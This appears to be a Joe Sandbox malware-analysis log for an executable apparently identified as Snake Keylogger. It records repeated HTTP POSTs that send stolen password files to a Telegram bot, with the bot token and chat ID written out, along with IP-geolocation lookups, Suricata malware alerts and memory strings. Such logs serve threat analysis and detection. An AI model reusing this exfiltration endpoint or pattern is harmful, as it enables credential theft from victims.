Source: global traffic	HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcedf825b5defeHost: api.telegram.orgContent-Length: 551
Source: global traffic	HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcee495f473e47Host: api.telegram.orgContent-Length: 551Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcee9ede9ecfcbHost: api.telegram.orgContent-Length: 551
Source: global traffic	HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dceef1595bfa24Host: api.telegram.orgContent-Length: 551Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcef804a628f99Host: api.telegram.orgContent-Length: 551
Source: global traffic	HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcefd3cec495f5Host: api.telegram.orgContent-Length: 551Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf02757f53aebHost: api.telegram.orgContent-Length: 551
Source: global traffic	HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf07553701b70Host: api.telegram.orgContent-Length: 551Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf0da5cd67621Host: api.telegram.orgContent-Length: 551Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf153b5b03cf7Host: api.telegram.orgContent-Length: 551
Source: global traffic	HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf1c5e0a55f4dHost: api.telegram.orgContent-Length: 551Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf2133ac4fdc1Host: api.telegram.orgContent-Length: 551
Source: global traffic	HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf446742a4c93Host: api.telegram.orgContent-Length: 551Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf4e11bdf27c5Host: api.telegram.orgContent-Length: 551
Source: global traffic	HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf532054265dfHost: api.telegram.orgContent-Length: 551Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf58390560c28Host: api.telegram.orgContent-Length: 551
Source: global traffic	HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf5b1dc6a6862Host: api.telegram.orgContent-Length: 551Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf5eba8e78de7Host: api.telegram.orgContent-Length: 551
Source: global traffic	HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf6876dc1317cHost: api.telegram.orgContent-Length: 551Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf6c18fae546bHost: api.telegram.orgContent-Length: 551
Source: global traffic	HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf7142122a2e8Host: api.telegram.orgContent-Length: 551Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf9d8c62b6eaaHost: api.telegram.orgContent-Length: 551Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcfa418297b08dHost: api.telegram.orgContent-Length: 551
Source: global traffic	HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcfaa80f9e2e7cHost: api.telegram.orgContent-Length: 551Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcfb05d9164ed6Host: api.telegram.orgContent-Length: 551Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcfb639c1a34e0Host: api.telegram.orgContent-Length: 551
Source: global traffic	HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcfbbd134a20abHost: api.telegram.orgContent-Length: 551Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcfc21661836e7Host: api.telegram.orgContent-Length: 551
Source: global traffic	HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcfc85c0ec18c4Host: api.telegram.orgContent-Length: 551Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcfce6f192956eHost: api.telegram.orgContent-Length: 551
Source: global traffic	HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcfd3a5a04b9e9Host: api.telegram.orgContent-Length: 551Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcfd8dd3173e73Host: api.telegram.orgContent-Length: 551
Source: global traffic	HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcffa729a7b8c8Host: api.telegram.orgContent-Length: 551Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd000d068243f5Host: api.telegram.orgContent-Length: 551
Source: global traffic	HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd006e6712ef2cHost: api.telegram.orgContent-Length: 551Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd01d1473ef670Host: api.telegram.orgContent-Length: 551Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd098f10ba3de7Host: api.telegram.orgContent-Length: 551
Source: global traffic	HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd26e1095c47bdHost: api.telegram.orgContent-Length: 551Connection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 193.122.130.0 193.122.130.0

Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49708 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49705 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49702 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49716 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49704 -> 188.114.96.3:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49703 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcdf51b32e3f53Host: api.telegram.orgContent-Length: 551Connection: Keep-Alive

Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002C22000.00000004.00000800.00020000.00000000.sdmp, .05.2024.exe, 0000000A.00000002.3748481710.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, .05.2024.exe, 0000000A.00000002.3748481710.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, .05.2024.exe, 0000000A.00000002.3748481710.0000000002AC4000.00000004.00000800.00020000.00000000.sdmp, .05.2024.exe, 0000000A.00000002.3748481710.0000000002B5F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.orgx
Source: .05.2024.exe, 0000000A.00000002.3748481710.00000000026D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: .05.2024.exe, 00000004.00000002.1306722987.000000000357C000.00000004.00000800.00020000.00000000.sdmp, .05.2024.exe, 0000000A.00000002.3746177900.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: .05.2024.exe, 00000004.00000002.1306064134.0000000002471000.00000004.00000800.00020000.00000000.sdmp, .05.2024.exe, 0000000A.00000002.3748481710.00000000026D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002864000.00000004.00000800.00020000.00000000.sdmp, .05.2024.exe, 0000000A.00000002.3748481710.0000000002C22000.00000004.00000800.00020000.00000000.sdmp, .05.2024.exe, 0000000A.00000002.3748481710.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, .05.2024.exe, 0000000A.00000002.3748481710.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, .05.2024.exe, 0000000A.00000002.3748481710.0000000002AC4000.00000004.00000800.00020000.00000000.sdmp, .05.2024.exe, 0000000A.00000002.3748481710.0000000002A3E000.00000004.00000800.00020000.00000000.sdmp, .05.2024.exe, 0000000A.00000002.3748481710.0000000002B5F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002B5F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002B5F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-420
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002D08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/botx
Source: .05.2024.exe, 00000004.00000002.1306722987.000000000357C000.00000004.00000800.00020000.00000000.sdmp, .05.2024.exe, 0000000A.00000002.3746177900.0000000000402000.00000040.00000400.00020000.00000000.sdmp, .05.2024.exe, 0000000A.00000002.3748481710.000000000271F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
